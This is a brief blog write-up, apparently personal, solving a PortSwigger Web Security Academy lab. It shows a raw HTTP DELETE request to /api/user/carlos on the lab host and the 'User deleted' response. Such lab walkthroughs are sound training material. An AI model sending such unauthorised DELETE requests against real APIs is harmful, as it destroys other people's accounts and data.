Skip to content

chojnowski.it

Port Swigger Exploiting an API endpoint using docu

Port Swigger Exploiting an API endpoint using docu

Exploiting an API endpoint using documentation¶

https://portswigger.net/web-security/learning-paths/api-testing/api-testing-identifying-and-interacting-with-api-endpoints/api-testing/lab-exploiting-unused-api-endpoint

https://0a87000e04fabf998028da2500cb00e3.web-security-academy.net/my-account

Find API documentation¶

https://0a87000e04fabf998028da2500cb00e3.web-security-academy.net/api/

Delete user: carlos¶

I use endpoint API /api/user/carlos and Method DELETE (before read API documentation)
---
* Request
DELETE /api/user/carlos HTTP/2
Host: 0a87000e04fabf998028da2500cb00e3.web-security-academy.net
Cookie: session=MCJB3U6RUlWB2ZInzCaHueZzwY1uKclF
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
---
* Response
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Length: 25

{"status":"User deleted"}

Solved¶

https://0a87000e04fabf998028da2500cb00e3.web-security-academy.net/api/